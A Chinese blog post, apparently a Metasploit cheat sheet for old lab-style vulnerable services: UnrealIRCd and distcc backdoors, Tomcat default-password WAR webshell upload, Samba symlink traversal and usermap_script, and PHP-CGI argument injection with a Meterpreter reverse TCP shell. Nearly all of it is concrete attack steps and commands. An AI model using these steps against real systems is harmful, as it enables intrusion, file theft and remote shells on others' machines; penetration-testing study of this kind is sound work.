Metasploit溢出漏洞

废话不多说直接上图帖命令?

  • Metasploit溢出UnrealIRCd后门漏洞(unrealircd 6667)
    1. Nmap  -sV  x.x.x.x //扫描端口,状态,服务,版本号
    2. search unreal ircd
    3. 选择 use exploit/unix/irc/unreal_ircd_3281_backdoor
    4. Show options 设置 rhost
    5. Exploit
  • Metasploit溢出Tomcat管理台默认口令漏洞(http 8180 apache tomcat/coyote jsp)
    1. Nmap-sV x.x.x //扫描端口,状态,服务,版本号
    2. 网页进入x.x.x:8180
    3. 进入管理页面(tomcat manager)
    4. Name:tomcat password:tomcat
    5. 点击browse 上传war包 然后按Deploy
    6. 输入http://x.x.x.x:8180/hacker/index.jsp   密码“87966550”
  • Metasploit溢出sysmlink默认配置目录遍历漏洞(samba 139 445)
    1. Nmap-sV x.x.x //扫描端口,状态,服务,版本号
    2. Search samba(选择use auxiliary/admin/smb/samba_symlink_traversal)
    3. Info set rhost
    4. Set smbshare tmp //设置SAM可写文件
    5. Expliot
    6. 终端输入    smbclient //x.x.x.x/tmp //回车  不需要密码
    7. cd rootfs        ls(more  /etc/passwd)
  1.  
  • Metasploit溢出samba提权漏洞(samba 139 445)
    1. Nmap-sV x.x.x //扫描端口,状态,服务,版本号
    2. Search samba(选择 use exploit/multi/samba/usermap_script)
    3. Info set rhost
    4. Exploit
  • Metasploit溢出phpMyAdmin漏洞(http 80)
    1. Nmap-sV x.x.x //扫描端口,状态,服务,版本号
    2. 看到开启的80端口 进入 “http://x.x.x.x”
    3. 用dirbuster扫描目标主机
    4. 选择字典 在/usr/share/dirbuster/wordlists
    5. 扫描结果显示包含cgi-bin目录,phpmyadmin目录
    6. Search php_cgi
    7. Use exploit/multi/http/php_cgi_arg_injection
    8. Show payloads
    9. set payloads php/meterpreter/reverse_tcp
    10. Set lhost    set rhost     exploit
    11. Sysinfo      ls     cat  phpinfo.php
  • Metasploit溢出Distcc后门漏洞(distcc 3632)
    1. Nmap-sV x.x.x //扫描端口,状态,服务,版本号
    2. Search distcc_exec
    3. Use exploit/unix/misc/distcc_exec
    4. Show options   set rhost    exploit
    5. Id     ifconfig    whoami

你可能感兴趣的:(黑科技)